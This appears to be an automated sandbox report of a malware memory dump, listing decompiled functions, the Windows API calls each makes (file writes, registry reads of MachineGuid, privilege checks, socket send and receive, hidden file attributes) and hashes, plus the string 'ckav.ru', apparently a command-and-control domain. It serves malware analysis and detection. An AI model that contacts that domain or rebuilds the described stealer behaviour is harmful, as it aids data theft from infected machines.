CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 00403C59 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(00000000,00000000,004041B3,00000000,F25E823B,00000000,00000000,?,004041B3,00000000,00000000,00000000), ref: 00403C3C

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
Instruction ID: 708ff4401ac3282b12d7668d94bc51921ab55dbb6f1a62cfe087fe8b706b923f
Opcode Fuzzy Hash: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
Instruction Fuzzy Hash: 57D0127200860CBFEF016EE59C05C7B3F5EEB04255B008825BD18E5021DA37DE2076E5

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
